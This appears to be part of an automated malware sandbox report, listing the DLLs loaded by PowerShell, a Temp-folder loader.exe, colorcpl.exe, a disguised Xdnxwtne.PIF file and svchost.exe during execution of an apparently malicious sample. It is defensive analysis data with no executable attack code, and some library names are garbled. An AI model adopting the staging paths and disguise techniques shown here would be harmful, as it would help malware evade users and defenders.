Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: chrome.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: tquery.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sti.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: chrome.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: tquery.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\colorcpl.exe Window detected: Number of UI elements: 12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: easinvoker.pdb source: loader.exe, 0000000E.00000002.1106214675.0000000020D18000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1029107436.000000007F980000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007ECA3000.00000004.00001000.00020000.00000000.sdmp, loader.exe, 0000000E.00000003.1033797948.000000007EC90000.00000004.00001000.00020000.00000000.sdmp
